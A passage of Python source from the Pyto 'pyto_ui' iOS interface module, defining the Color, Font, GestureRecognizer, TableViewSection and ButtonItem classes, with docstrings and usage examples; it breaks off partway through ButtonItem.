SYSTEM_ITEM_PAUSE = ui_constants.SYSTEM_ITEM_PAUSE
"""
The system pause button.
"""
SYSTEM_ITEM_PLAY = ui_constants.SYSTEM_ITEM_PLAY
"""
The system play button.
"""
SYSTEM_ITEM_REDO = ui_constants.SYSTEM_ITEM_REDO
"""
The system redo button.
"""
SYSTEM_ITEM_REFRESH = ui_constants.SYSTEM_ITEM_REFRESH
"""
The system refresh button.
"""
SYSTEM_ITEM_REPLY = ui_constants.SYSTEM_ITEM_REPLY
"""
The system reply button.
"""
SYSTEM_ITEM_REWIND = ui_constants.SYSTEM_ITEM_REWIND
"""
The system rewind button.
"""
SYSTEM_ITEM_SAVE = ui_constants.SYSTEM_ITEM_SAVE
"""
The system Save button, localized.
"""
SYSTEM_ITEM_SEARCH = ui_constants.SYSTEM_ITEM_SEARCH
"""
The system search button.
"""
SYSTEM_ITEM_STOP = ui_constants.SYSTEM_ITEM_STOP
"""
The system stop button.
"""
SYSTEM_ITEM_TRASH = ui_constants.SYSTEM_ITEM_TRASH
"""
The system trash button.
"""
SYSTEM_ITEM_UNDO = ui_constants.SYSTEM_ITEM_UNDO
"""
The system undo button.
"""
###############
# MARK: - Other Classes
###############
# MARK: - Color
class Color:
"""
A ``Color`` object represents a color to be displayed on screen.
Example:
.. highlight:: python
.. code-block:: python
import pyto_ui as ui
# RGB
black = ui.Color.rgb(0, 0, 0, 1)
# White
white = ui.Color.white(1, 1)
# Dynamic
background = ui.Color.dynamic(light=white, dark=black)
For pre-defined colors, see `Color <constants.html#ui-elements-colors>`_ constants.
"""
__py_color__ = None
def _hex_to_rgb(self, hx, hsl=False):
if re.compile(r'#[a-fA-F0-9]{3}(?:[a-fA-F0-9]{3})?$').match(hx):
div = 255.0 if hsl else 0
if len(hx) <= 4:
return tuple(int(hx[i]*2, 16) / div if div else
int(hx[i]*2, 16) for i in (1, 2, 3))
return tuple(int(hx[i:i+2], 16) / div if div else
int(hx[i:i+2], 16) for i in (1, 3, 5))
raise ValueError(f'"{hx}" is not a valid HEX code.')
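# e.g. _hex_to_rgb("#fff") -> (255, 255, 255), while
# _hex_to_rgb("#ff8000", hsl=True) -> (1.0, ~0.502, 0.0); the hsl
# flag switches the components from 0-255 ints to 0-1 floats.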
def configure_from_dictionary(self, obj):
cls = Color
if isinstance(obj, str):
if obj.startswith("#"):
color = self._hex_to_rgb(obj)
self.__py_color__ = cls.rgb(color[0]/255, color[1]/255, color[2]/255).__py_color__
else:
name = "color_"+obj
name = name.upper()
self.__py_color__ = globals()[name].__py_color__
elif isinstance(obj, dict):
if "dark" in obj and "light" in obj:
light = cls.__new__(cls)
light.configure_from_dictionary(obj["light"])
dark = cls.__new__(cls)
dark.configure_from_dictionary(obj["dark"])
self.__py_color__ = cls.dynamic(light, dark).__py_color__
else:
try:
alpha = obj["alpha"]
except KeyError:
alpha = 1
self.__py_color__ = cls.rgb(obj["red"], obj["green"], obj["blue"], alpha).__py_color__
else:
return None
def dictionary_representation(self):
if self._dark is not None and self._light is not None:
return {
"dark": self._dark.dictionary_representation(),
"light": self._light.dictionary_representation()
}
else:
everything = list(globals().keys()).copy()
declared_colors = []
for key in everything:
if key.startswith("COLOR_") and isinstance(globals()[key], Color):
declared_colors.append(key)
for color_name in declared_colors:
if globals()[color_name].__py_color__.isEqual(self.__py_color__):
return color_name.lower().split("color_")[1]
return {
"red": self.red(),
"green": self.green(),
"blue": self.blue(),
"alpha": self.alpha()
}
def red(self) -> float:
"""
Returns the red value of the color.
:rtype: float
"""
return float(self.__py_color__.red)
def green(self) -> float:
"""
Returns the green value of the color.
:rtype: float
"""
return float(self.__py_color__.green)
def blue(self) -> float:
"""
Returns the blue value of the color.
:rtype: float
"""
return float(self.__py_color__.blue)
def alpha(self) -> float:
"""
Returns the alpha value of the color.
:rtype: float
"""
return float(self.__py_color__.alpha)
def __init__(self, py_color):
self.__py_color__ = py_color
self._light = None
self._dark = None
# def __del__(self):
# self.__py_color__.release()
def __repr__(self):
return "<"+self.__class__.__module__+"."+self.__class__.__name__+" "+str(self.__py_color__.managed.description)+">"
@classmethod
def rgb(cls, red: float, green: float, blue: float, alpha: float = 1) -> Color:
"""
Initializes a color from RGB values.
All values should be located between 0 and 1, not between 0 and 255.
:param red: The red value.
:param green: The green value.
:param blue: The blue value.
:param alpha: The opacity value.
:rtype: pyto_ui.Color
"""
check(red, "red", [float, int])
check(green, "green", [float, int])
check(blue, "blue", [float, int])
check(alpha, "alpha", [float, int])
if red > 1 or green > 1 or blue > 1 or alpha > 1:
raise ValueError("Values must be located between 0 and 1.")
return cls(__PyColor__.colorWithRed(red, green=green, blue=blue, alpha=alpha))
@classmethod
def white(cls, white: float, alpha: float) -> Color:
"""
Initializes and returns a color from white value.
All values should be located between 0 and 1, not between 0 and 255.
:param white: The grayscale value.
:param alpha: The opacity value.
:rtype: pyto_ui.Color
"""
check(white, "white", [float, int])
check(alpha, "alpha", [float, int])
if white > 1 or alpha > 1:
raise ValueError("Values must be located between 0 and 1.")
return cls(__PyColor__.colorWithWhite(white, alpha=alpha))
@classmethod
def dynamic(cls, light: Color, dark: Color) -> Color:
"""
Initializes and returns a color that dynamically changes in dark or light mode.
:param light: :class:`~pyto_ui.Color` object to be displayed in light mode.
:param dark: :class:`~pyto_ui.Color` object to be displayed in dark mode.
:rtype: pyto_ui.Color
"""
check(light, "light", Color)
check(dark, "dark", Color)
object = cls(
__PyColor__.colorWithLight(light.__py_color__, dark=dark.__py_color__)
)
object._light = light
object._dark = dark
return object
def __eq__(self, other):
try:
return (
self.red() == other.red()
and self.green() == other.green()
and self.blue() == other.blue()
and self.alpha() == other.alpha()
)
except AttributeError:
return False
COLOR_LABEL = Color(ui_constants.COLOR_LABEL)
""" The color for text labels containing primary content. """
COLOR_SECONDARY_LABEL = Color(ui_constants.COLOR_SECONDARY_LABEL)
""" The color for text labels containing secondary content. """
COLOR_TERTIARY_LABEL = Color(ui_constants.COLOR_TERTIARY_LABEL)
""" The color for text labels containing tertiary content. """
COLOR_QUATERNARY_LABEL = Color(ui_constants.COLOR_QUATERNARY_LABEL)
""" The color for text labels containing quaternary content. """
COLOR_SYSTEM_FILL = Color(ui_constants.COLOR_SYSTEM_FILL)
""" An overlay fill color for thin and small shapes. """
COLOR_SECONDARY_SYSTEM_FILL = Color(ui_constants.COLOR_SECONDARY_SYSTEM_FILL)
""" An overlay fill color for medium-size shapes. """
COLOR_TERTIARY_SYSTEM_FILL = Color(ui_constants.COLOR_TERTIARY_SYSTEM_FILL)
""" An overlay fill color for large shapes. """
COLOR_QUATERNARY_SYSTEM_FILL = Color(ui_constants.COLOR_QUATERNARY_SYSTEM_FILL)
""" An overlay fill color for large areas containing complex content. """
COLOR_PLACEHOLDER_TEXT = Color(ui_constants.COLOR_PLACEHOLDER_TEXT)
""" The color for placeholder text in controls or text views. """
COLOR_SYSTEM_BACKGROUND = Color(ui_constants.COLOR_SYSTEM_BACKGROUND)
""" The color for the main background of your interface. """
COLOR_SECONDARY_SYSTEM_BACKGROUND = Color(
ui_constants.COLOR_SECONDARY_SYSTEM_BACKGROUND
)
""" The color for content layered on top of the main background. """
COLOR_TERTIARY_SYSTEM_BACKGROUND = Color(ui_constants.COLOR_TERTIARY_SYSTEM_BACKGROUND)
""" The color for content layered on top of secondary backgrounds. """
COLOR_SYSTEM_GROUPED_BACKGROUND = Color(ui_constants.COLOR_SYSTEM_GROUPED_BACKGROUND)
""" The color for the main background of your grouped interface. """
COLOR_SECONDARY_GROUPED_BACKGROUND = Color(
ui_constants.COLOR_SECONDARY_GROUPED_BACKGROUND
)
""" The color for content layered on top of the main background of your grouped interface. """
COLOR_TERTIARY_GROUPED_BACKGROUND = Color(
ui_constants.COLOR_TERTIARY_GROUPED_BACKGROUND
)
""" The color for content layered on top of secondary backgrounds of your grouped interface. """
COLOR_SEPARATOR = Color(ui_constants.COLOR_SEPARATOR)
""" The color for thin borders or divider lines that allows some underlying content to be visible. """
COLOR_OPAQUE_SEPARATOR = Color(ui_constants.COLOR_OPAQUE_SEPARATOR)
""" The color for borders or divider lines that hide any underlying content. """
COLOR_LINK = Color(ui_constants.COLOR_LINK)
""" The color for links. """
COLOR_DARK_TEXT = Color(ui_constants.COLOR_DARK_TEXT)
""" The nonadaptable system color for text on a light background. """
COLOR_LIGHT_TEXT = Color(ui_constants.COLOR_LIGHT_TEXT)
""" The nonadaptable system color for text on a dark background. """
COLOR_SYSTEM_BLUE = Color(ui_constants.COLOR_SYSTEM_BLUE)
""" A blue color that automatically adapts to the current trait environment. """
COLOR_SYSTEM_GREEN = Color(ui_constants.COLOR_SYSTEM_GREEN)
""" A green color that automatically adapts to the current trait environment. """
COLOR_SYSTEM_INDIGO = Color(ui_constants.COLOR_SYSTEM_INDIGO)
""" An indigo color that automatically adapts to the current trait environment. """
COLOR_SYSTEM_ORANGE = Color(ui_constants.COLOR_SYSTEM_ORANGE)
""" An orange color that automatically adapts to the current trait environment. """
COLOR_SYSTEM_PINK = Color(ui_constants.COLOR_SYSTEM_PINK)
""" A pink color that automatically adapts to the current trait environment. """
COLOR_SYSTEM_PURPLE = Color(ui_constants.COLOR_SYSTEM_PURPLE)
""" A purple color that automatically adapts to the current trait environment. """
COLOR_SYSTEM_RED = Color(ui_constants.COLOR_SYSTEM_RED)
""" A red color that automatically adapts to the current trait environment. """
COLOR_SYSTEM_TEAL = Color(ui_constants.COLOR_SYSTEM_TEAL)
""" A teal color that automatically adapts to the current trait environment. """
COLOR_SYSTEM_YELLOW = Color(ui_constants.COLOR_SYSTEM_YELLOW)
""" A yellow color that automatically adapts to the current trait environment. """
COLOR_SYSTEM_GRAY = Color(ui_constants.COLOR_SYSTEM_GRAY)
""" The base gray color. """
COLOR_SYSTEM_GRAY2 = Color(ui_constants.COLOR_SYSTEM_GRAY2)
""" A second-level shade of grey. """
COLOR_SYSTEM_GRAY3 = Color(ui_constants.COLOR_SYSTEM_GRAY3)
""" A third-level shade of grey. """
COLOR_SYSTEM_GRAY4 = Color(ui_constants.COLOR_SYSTEM_GRAY4)
""" A fourth-level shade of grey. """
COLOR_SYSTEM_GRAY5 = Color(ui_constants.COLOR_SYSTEM_GRAY5)
""" A fifth-level shade of grey. """
COLOR_SYSTEM_GRAY6 = Color(ui_constants.COLOR_SYSTEM_GRAY6)
""" A sixth-level shade of grey. """
COLOR_CLEAR = Color(ui_constants.COLOR_CLEAR)
""" A color object with grayscale and alpha values that are both 0.0. """
COLOR_BLACK = Color(ui_constants.COLOR_BLACK)
""" A color object in the sRGB color space with a grayscale value of 0.0 and an alpha value of 1.0. """
COLOR_BLUE = Color(ui_constants.COLOR_BLUE)
""" A color object with RGB values of 0.0, 0.0, and 1.0 and an alpha value of 1.0. """
COLOR_BROWN = Color(ui_constants.COLOR_BROWN)
""" A color object with RGB values of 0.6, 0.4, and 0.2 and an alpha value of 1.0. """
COLOR_CYAN = Color(ui_constants.COLOR_CYAN)
""" A color object with RGB values of 0.0, 1.0, and 1.0 and an alpha value of 1.0. """
COLOR_DARK_GRAY = Color(ui_constants.COLOR_DARK_GRAY)
""" A color object with a grayscale value of 1/3 and an alpha value of 1.0. """
COLOR_GRAY = Color(ui_constants.COLOR_GRAY)
""" A color object with a grayscale value of 0.5 and an alpha value of 1.0. """
COLOR_GREEN = Color(ui_constants.COLOR_GREEN)
""" A color object with RGB values of 0.0, 1.0, and 0.0 and an alpha value of 1.0. """
COLOR_LIGHT_GRAY = Color(ui_constants.COLOR_LIGHT_GRAY)
""" A color object with a grayscale value of 2/3 and an alpha value of 1.0. """
COLOR_MAGENTA = Color(ui_constants.COLOR_MAGENTA)
""" A color object with RGB values of 1.0, 0.0, and 1.0 and an alpha value of 1.0. """
COLOR_ORANGE = Color(ui_constants.COLOR_ORANGE)
""" A color object with RGB values of 1.0, 0.5, and 0.0 and an alpha value of 1.0. """
COLOR_PURPLE = Color(ui_constants.COLOR_PURPLE)
""" A color object with RGB values of 0.5, 0.0, and 0.5 and an alpha value of 1.0. """
COLOR_RED = Color(ui_constants.COLOR_RED)
""" A color object with RGB values of 1.0, 0.0, and 0.0 and an alpha value of 1.0. """
COLOR_WHITE = Color(ui_constants.COLOR_WHITE)
""" A color object with a grayscale value of 1.0 and an alpha value of 1.0. """
COLOR_YELLOW = Color(ui_constants.COLOR_YELLOW)
""" A color object with RGB values of 1.0, 1.0, and 0.0 and an alpha value of 1.0. """
try:
if not COLOR_CLEAR.__py_color__.objc_class.name.endswith("PyColor"): # Something went wrong, retry
del sys.modules["ui_constants"]
del sys.modules["pyto_ui"]
import pyto_ui as _ui
globals().update(_ui.__dict__)
except AttributeError:
pass
# MARK: - Font
class Font:
"""
A ``Font`` object represents a font (with a name and size) to be used on labels, buttons, text views, etc.
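Example (a minimal sketch, assuming it runs inside Pyto where ``pyto_ui`` is available):
.. highlight:: python
.. code-block:: python
    import pyto_ui as ui
    label = ui.Label("Hello World!")
    label.font = ui.Font.bold_system_font_of_size(17)
    label.font = label.font.with_size(21)  # same font, larger size
    ui.show_view(label)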
"""
__ui_font__ = None
def __init__(self, name: str, size: float):
"""
Initializes a font with given name and size.
:param name: The fully specified name of the font. This name incorporates both the font family name and the specific style information for the font.
:param size: The size (in points) to which the font is scaled. This value must be greater than 0.0.
"""
check(name, "name", [str, None])
check(size, "size", [float, int, None])
if name is None and size is None:
return
self.__ui_font__ = __UIFont__.fontWithName(name, size=CGFloat(size))
def configure_from_dictionary(self, obj):
# 'obj' is either a number (a system font size), a "Name-Size" string, or a plain font name.
try:
size = float(obj)
self.__ui_font__ = __UIFont__.systemFontOfSize(CGFloat(size))
except ValueError:
try:
# Split a "Name-Size" string into the font name and its point size.
parts = obj.split("-")
name_parts = parts.copy()
del name_parts[-1]
name = "-".join(name_parts)
self.__init__(name, float(parts[-1]))
except ValueError:
# A plain font name without a size; fall back to the system font size.
self.__init__(obj, FONT_SYSTEM_SIZE)
def dictionary_representation(self):
return f"{str(self.__ui_font__.fontName)}-{float(self.__ui_font__.pointSize)}"
def __repr__(self):
return "<"+self.__class__.__module__+"."+self.__class__.__name__+" "+str(self.__ui_font__.description)+">"
def with_size(self, size: float) -> Font:
"""
Returns a font object that is the same as the receiver but which has the specified size instead.
:param size: The desired size (in points) of the new font object. This value must be greater than 0.0.
:rtype: pyto_ui.Font
"""
check(size, "size", [float, int])
font = self.__class__(None, None)
font.__ui_font__ = self.__ui_font__.fontWithSize(CGFloat(size))
return font
@classmethod
def font_names_for_family_name(cls, name: str) -> List[str]:
"""
Returns an array of font names available in a particular font family.
:param name: The name of the font family. Use the :func:`~pyto_ui.font_family_names` function to get an array of the available font family names on the system.
:rtype: List[str]
"""
check(name, "name", [str])
names = __UIFont__.fontNamesForFamilyName(name)
py_names = []
for name in names:
py_names.append(str(name))
return py_names
@classmethod
def system_font_of_size(cls, size: float) -> Font:
"""
Returns the font object used for standard interface items in the specified size.
:param size: The size (in points) to which the font is scaled. This value must be greater than 0.0.
:rtype: pyto_ui.Font
"""
check(size, "size", [float, int])
font = cls(None, None)
font.__ui_font__ = __UIFont__.systemFontOfSize(CGFloat(size))
return font
@classmethod
def italic_system_font_of_size(cls, size: float) -> Font:
"""
Returns the font object used for standard interface items that are rendered in italic type in the specified size.
:param size: The size (in points) for the font. This value must be greater than 0.0.
:rtype: pyto_ui.Font
"""
check(size, "size", [float, int])
font = cls(None, None)
font.__ui_font__ = __UIFont__.italicSystemFontOfSize(CGFloat(size))
return font
@classmethod
def bold_system_font_of_size(cls, size: float) -> Font:
"""
Returns the font object used for standard interface items that are rendered in boldface type in the specified size.
:param size: The size (in points) for the font. This value must be greater than 0.0.
:rtype: pyto_ui.Font
"""
check(size, "size", [float, int])
font = cls(None, None)
font.__ui_font__ = __UIFont__.boldSystemFontOfSize(CGFloat(size))
return font
@classmethod
def font_with_style(cls, style: FONT_TEXT_STYLE) -> Font:
"""
Returns an instance of the system font for the specified text style and scaled appropriately for the user's selected content size category.
:param style: The text style for which to return a font. See `Font Text Style <constants.html#font-text-style>`_ constants for possible values.
:rtype: pyto_ui.Font
"""
check(style, "style", [str])
font = cls(None, None)
font.__ui_font__ = __UIFont__.preferredFontForTextStyle(style)
return font
# MARK: - Gesture Recognizer
class GestureRecognizer:
"""
A gesture-recognizer object—or, simply, a gesture recognizer—decouples the logic for recognizing a sequence of touches (or other input) and acting on that recognition. When one of these objects recognizes a common gesture or, in some cases, a change in the gesture, it sends an action message to each designated target object.
This class represents the type of gesture passed to the ``type`` initializer parameter. See `Gesture Type <constants.html#gesture-type>`_ constants for possible values.
When the gesture starts, changes or is cancelled, ``action`` is called with the gesture recognizer as its parameter. You can then access the location and the state from it.
Example:
.. highlight:: python
.. code-block:: python
'''
Move a circle with finger.
'''
import pyto_ui as ui
view = ui.View()
view.background_color = ui.COLOR_SYSTEM_BACKGROUND
circle = ui.View()
circle.size = (50, 50)
circle.center = (view.width/2, view.height/2)
circle.flex = [ui.FLEXIBLE_TOP_MARGIN, ui.FLEXIBLE_BOTTOM_MARGIN, ui.FLEXIBLE_LEFT_MARGIN, ui.FLEXIBLE_RIGHT_MARGIN]
circle.corner_radius = 25
circle.background_color = ui.COLOR_LABEL
view.add_subview(circle)
def move(sender: ui.GestureRecognizer):
    if sender.state == ui.GESTURE_STATE_CHANGED:
        circle.center = sender.location
gesture = ui.GestureRecognizer(ui.GESTURE_TYPE_PAN)
gesture.action = move
view.add_gesture_recognizer(gesture)
ui.show_view(view)
"""
__py_gesture__ = None
def __init__(
self, type: GESTURE_TYPE, action: Callable[[GestureRecognizer], None] = None
):
if type.objc_class == __PyGestureRecognizer__:
self.__py_gesture__ = type
else:
self.__py_gesture__ = __PyGestureRecognizer__.newRecognizerWithType(type)
self.__py_gesture__.managedValue = _values.value(self)
if action is not None:
self.action = action
def __repr__(self):
return "<"+self.__class__.__module__+"."+self.__class__.__name__+" "+str(self.__py_gesture__.managed.description)+">"
__x__ = []
__y__ = []
@property
def x(self) -> float:
"""
(Read Only) Returns the X position of the gesture in its container view.
:rtype: float
"""
try:
return self.__x__[0]
except IndexError:
return None
@property
def y(self) -> float:
"""
(Read Only) Returns the Y position of the gesture in its container view.
"""
try:
return self.__y__[0]
except IndexError:
return None
@property
def location(self) -> Tuple[float, float]:
"""
(Read Only) Returns a tuple with the X and the Y position of the gesture in its container view.
:rtype: Tuple[float, float]
"""
tup = (self.x, self.y)
if tup == (None, None):
return None
else:
return tup
@property
def view(self) -> "View":
"""
(Read Only) Returns the view associated with the gesture.
:rtype: View
"""
view = self.__py_gesture__.view
if view is None:
return None
else:
_view = View()
_view.__py_view__ = view
return _view
@property
def enabled(self) -> bool:
"""
A boolean indicating whether the gesture recognizer is enabled.
:rtype: bool
"""
return self.__py_gesture__.enabled
@enabled.setter
def enabled(self, new_value: bool):
self.__py_gesture__.enabled = new_value
__number_of_touches__ = None
@property
def number_of_touches(self) -> int:
"""
(Read Only) Returns the number of touches involved in the gesture represented by the receiver.
:rtype: int
"""
if self.__number_of_touches__ is not None:
return self.__number_of_touches__
else:
return self.__py_gesture__.numberOfTouches
__state__ = None
@property
def state(self) -> GESTURE_STATE:
"""
(Read Only) The current state of the gesture recognizer.
:rtype: `Gesture State <constants.html#gesture-state>`_
"""
if self.__state__ is not None:
return self.__state__
else:
return self.__py_gesture__.state
@property
def requires_exclusive_touch_type(self) -> bool:
"""
A Boolean indicating whether the gesture recognizer considers touches of different types simultaneously.
:rtype: bool
"""
return self.__py_gesture__.requiresExclusiveTouchType
@requires_exclusive_touch_type.setter
def requires_exclusive_touch_type(self, new_value: bool):
self.__py_gesture__.requiresExclusiveTouchType = new_value
@property
def delays_touches_ended(self) -> bool:
"""
A Boolean value determining whether the receiver delays sending touches in an end phase to its view.
:rtype: bool
"""
return self.__py_gesture__.delaysTouchesEnded
@delays_touches_ended.setter
def delays_touches_ended(self, new_value: bool):
self.__py_gesture__.delaysTouchesEnded = new_value
@property
def delays_touches_began(self) -> bool:
"""
A Boolean value determining whether the receiver delays sending touches in a begin phase to its view.
:rtype: bool
"""
return self.__py_gesture__.delaysTouchesBegan
@delays_touches_began.setter
def delays_touches_began(self, new_value: bool):
self.__py_gesture__.delaysTouchesBegan = new_value
@property
def cancels_touches_in_view(self) -> bool:
"""
A Boolean value affecting whether touches are delivered to a view when a gesture is recognized.
:rtype: bool
"""
return self.__py_gesture__.cancelsTouchesInView
@cancels_touches_in_view.setter
def cancels_touches_in_view(self, new_value: bool):
self.__py_gesture__.cancelsTouchesInView = new_value
@property
def allowed_touch_types(self) -> List[TOUCH_TYPE]:
"""
An array of touch types used to distinguish types of touches. For possible values, see ``Touch Type`` constants.
:rtype: List[`Touch Type <constants.html#touch-type>`_]
"""
return self.__py_gesture__.allowedTouchTypes
@allowed_touch_types.setter
def allowed_touch_types(self, new_value: List[TOUCH_TYPE]):
self.__py_gesture__.allowedTouchTypes = new_value
@property
def action(self) -> Callable[[GestureRecognizer], None]:
"""
A function called to handle the gesture. Takes the sender gesture recognizer as parameter.
:rtype: Callable[[GestureRecognizer], None]
"""
action = self.__py_gesture__.action
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@action.setter
def action(self, new_value: Callable[[GestureRecognizer], None]):
if new_value is None:
self.__py_gesture__.action = None
else:
self.__py_gesture__.action = _values.value(new_value)
@property
def minimum_press_duration(self) -> float:
"""
The minimum time that the user must press on the view for the gesture to be recognized.
(Only works for long press gestures)
:rtype: float
"""
return self.__py_gesture__.minimumDuration
@minimum_press_duration.setter
def minimum_press_duration(self, new_value: float):
self.__py_gesture__.minimumDuration = new_value
# MARK: - Table View Section
class TableViewSection:
"""
An object representing a section in a Table View.
A section has a title and a list of cells it contains.
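Example (a minimal sketch; assumes ``TableViewCell`` exposes a ``text_label`` label and ``TableView`` a ``sections`` list, as elsewhere in this module):
.. highlight:: python
.. code-block:: python
    import pyto_ui as ui
    cell = ui.TableViewCell()
    cell.text_label.text = "Apple"
    section = ui.TableViewSection("Fruits", [cell])
    table_view = ui.TableView()
    table_view.sections = [section]
    ui.show_view(table_view)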
"""
__py_section__ = None
_parent = None
def configure_from_dictionary(self, dictionary):
if "title" in dictionary and dictionary["title"] is not None:
self.title = dictionary["title"]
if "cells" in dictionary and dictionary["cells"] is not None:
cells = []
for cell in dictionary["cells"]:
if isinstance(cell, View):
cell = cell.dictionary_representation()
_cell = TableViewCell()
_cell._parent = self._parent
_cell.configure_from_dictionary(cell)
cells.append(_cell)
self.cells = cells
def dictionary_representation(self):
cells = []
for cell in self.cells:
cells.append(cell.dictionary_representation())
d = {
"title": self.title,
"cells": cells
}
return d
def __init__(self, title: str = "", cells: List["TableViewCell"] = []):
self.__py_section__ = __PyTableViewSection__.new()
self.__py_section__.managedValue = _values.value(self)
self.title = title
self.cells = cells
def __del__(self):
self.__py_section__.releaseReference()
self.__py_section__.release()
def __setattr__(self, name, value):
if name == "__py_section__":
previous = self.__py_section__
if previous is not None and previous.references == 1:
previous.releaseReference()
previous.release()
elif previous is not None:
if previous not in _gc.collected:
_gc.collected.append(previous)
if value is not None:
value.retainReference()
#value.retain()
super().__setattr__(name, value)
@property
def table_view(self) -> "TableView":
"""
(Read Only) Returns the Table view associated with the section.
:rtype: TableView
"""
table_view = self.__py_section__.tableView
if table_view is None:
return None
else:
py_table_view = TableView()
py_table_view.__py_view__ = table_view
return py_table_view
@property
def title(self) -> str:
"""
The title of the section displayed on screen.
:rtype: str
"""
return str(self.__py_section__.title)
@title.setter
def title(self, new_value: str):
self.__py_section__.title = new_value
@property
def cells(self) -> "TableViewCell":
"""
Cells contained in the section. After setting a value, the section will be reloaded automatically.
:rtype: TableViewCell
"""
cells = self.__py_section__.cells
py_cells = []
for cell in cells:
py_cell = TableViewCell()
py_cell.__py_view__ = cell
py_cells.append(py_cell)
return py_cells
@cells.setter
def cells(self, new_value: "TableViewCell"):
cells = []
for cell in new_value:
cells.append(cell.__py_view__)
self.__py_section__.cells = cells
@property
def did_select_cell(self) -> Callable[[TableViewSection, int], None]:
"""
A function called when a cell contained in the section is selected. Takes the sender section and the selected cell's index as parameters.
:rtype: Callable[[TableViewSection, int], None]
"""
action = self.__py_section__.didSelectCell
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_select_cell.setter
def did_select_cell(self, new_value: Callable[[TableViewSection, int], None]):
if new_value is None:
self.__py_section__.didSelectCell = None
else:
self.__py_section__.didSelectCell = _values.value(new_value)
@property
def did_tap_cell_accessory_button(self) -> Callable[[TableViewSection, int], None]:
"""
A function called when the accessory button of a cell contained in the section is pressed. Takes the sender section and the cell's index as parameters.
:rtype: Callable[[TableViewSection, int], None]
"""
action = self.__py_section__.accessoryButtonTapped
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_tap_cell_accessory_button.setter
def did_tap_cell_accessory_button(
self, new_value: Callable[[TableViewSection, int], None]
):
if new_value is None:
self.__py_section__.accessoryButtonTapped = None
else:
self.__py_section__.accessoryButtonTapped = _values.value(new_value)
@property
def did_delete_cell(self) -> Callable[[TableViewSection, int], None]:
"""
A function called when a cell contained in the section is deleted. Takes the sender section and the deleted cell's index as parameters.
This function should be used to remove the data corresponding to the cell from the database.
:rtype: Callable[[TableViewSection, int], None]
"""
action = self.__py_section__.didDeleteCell
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_delete_cell.setter
def did_delete_cell(self, new_value: Callable[[TableViewSection, int], None]):
if new_value is None:
self.__py_section__.didDeleteCell = None
else:
self.__py_section__.didDeleteCell = _values.value(new_value)
@property
def did_move_cell(self) -> Callable[[TableViewSection, int, int], None]:
"""
A function called when a cell contained in the section is moved. Takes the sender section, the moved cell's index and the destination index as parameters.
This function should be used to move the data corresponding to the cell in the database.
:rtype: Callable[[TableViewSection, int, int], None]
"""
action = self.__py_section__.didMoveCell
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_move_cell.setter
def did_move_cell(self, new_value: Callable[[TableViewSection, int, int], None]):
if new_value is None:
self.__py_section__.didMoveCell = None
else:
self.__py_section__.didMoveCell = _values.value(new_value)
# MARK: - Button Item
class ButtonItem:
"""
A special kind of button that can be placed on the view's navigation bar. Can have a title, an image or a system item.
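Example (a minimal sketch):
.. highlight:: python
.. code-block:: python
    import pyto_ui as ui
    def tapped(item: ui.ButtonItem):
        print("Done tapped")
    item = ui.ButtonItem(title="Done")
    item.action = tapped
    view = ui.View()
    view.button_items = [item]
    ui.show_view(view)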
"""
__py_item__ = None
_system_item = None
_style = None
_get_function = None
_parent = None
def __del__(self):
self.__py_item__.releaseReference()
self.__py_item__.release()
def __setattr__(self, name, value):
if name == "__py_item__":
previous = self.__py_item__
if previous is not None and previous.references == 1:
previous.releaseReference()
previous.release()
elif previous is not None:
if previous not in _gc.collected:
_gc.collected.append(previous)
if value is not None:
value.retainReference()
value.retain()
super().__setattr__(name, value)
def dictionary_representation(self):
dict = {}
if self.title is not None:
dict["title"] = self.title
if self.image is not None and isinstance(self.image, Image.Image):
dict["image"] = self.image.filename
if self._system_item is not None:
for key in list(globals().keys()).copy():
if key.startswith("SYSTEM_ITEM_") and globals()[key] == self._system_item:
dict["system_item"] = key.split("SYSTEM_ITEM_")[1].lower()
dict["enabled"] = self.enabled
for name in dir(self):
try:
func = getattr(self.__class__, name)
if not isinstance(func, property):
continue
func = func.fget
sig = signature(func)
if sig.return_annotation.startswith("Callable["):
value = getattr(self, name)
if callable(value) and "__self__" in dir(value) and value.__self__ == self:
dict[name] = "self."+value.__name__
except AttributeError:
continue
return dict
def configure_from_dictionary(self, dictionary):
def get(key, _dict=dictionary, default=None):
try:
return _dict[key]
except KeyError:
return default
if "connections" in dictionary:
def _get_connections(key, default=None):
return get(key, _dict=dictionary["connections"], default=default)
self._get_function = _get_connections
system_item = get("system_item")
if system_item is not None:
name = "SYSTEM_ITEM_"+(system_item.upper())
self._system_item = globals()[name]
self.__py_item__ = __PyButtonItem__.alloc().initWithSystemItem(self._system_item)
self.title = get("title")
if get("image") is not None:
if os.path.isfile(get("image")):
self.image = Image.open(get("image"))
else:
self.image = image_with_system_name(get("image"))
self.enabled = get("enabled", default=True)
View._decode_functions(self)
def __init__(
self,
title: str = None,
image: "Image" = None,
system_item: SYSTEM_ITEM = None,
style: BUTTON_ITEM_STYLE = __v__("BUTTON_ITEM_STYLE_PLAIN"),
):
if style == "BUTTON_ITEM_STYLE_PLAIN":
style = BUTTON_ITEM_STYLE_PLAIN
if system_item is not None:
self.__py_item__ = __PyButtonItem__.alloc().initWithSystemItem(system_item)
self._system_item = system_item
else:
self.__py_item__ = __PyButtonItem__.alloc().initWithStyle(style)
self._style = style
self.__py_item__.managedValue = _values.value(self)
self.title = title
self.image = image
def __repr__(self):
return "<"+self.__class__.__module__+"."+self.__class__.__name__+" "+str(self.__py_item__.managed.description)+">"
@property
def title(self) -> str:
"""
The title of the button displayed on screen.
:rtype: str
"""
title = self.__py_item__.title
if title is not None:
return str(title)
else:
return None
@title.setter
def title(self, new_value: str):
self.__py_item__.title = new_value
@property
def image(self) -> "Image.Image":
"""
A ``PIL`` image object displayed on screen. May also be a ``UIKit`` ``UIImage`` symbol. See :func:`~pyto_ui.image_with_system_name`.
:rtype: PIL.Image.Image
"""
ui_image = self.__py_item__.image
if ui_image is None:
return None
elif ui_image.symbolImage:
return ui_image
else:
return __pil_image_from_ui_image__(ui_image)
@image.setter
def image(self, new_value: "Image"):
if new_value is None:
self.__py_item__.image = None
elif "objc_class" in dir(new_value) and new_value.objc_class == UIImage:
self.__py_item__.image = new_value
else:
self.__py_item__.image = __ui_image_from_pil_image__(new_value)
@property
def enabled(self) -> bool:
"""
A boolean indicating whether the button is enabled.
:rtype: bool
"""
return self.__py_item__.enabled
@enabled.setter
def enabled(self, new_value: bool):
self.__py_item__.enabled = new_value
@property
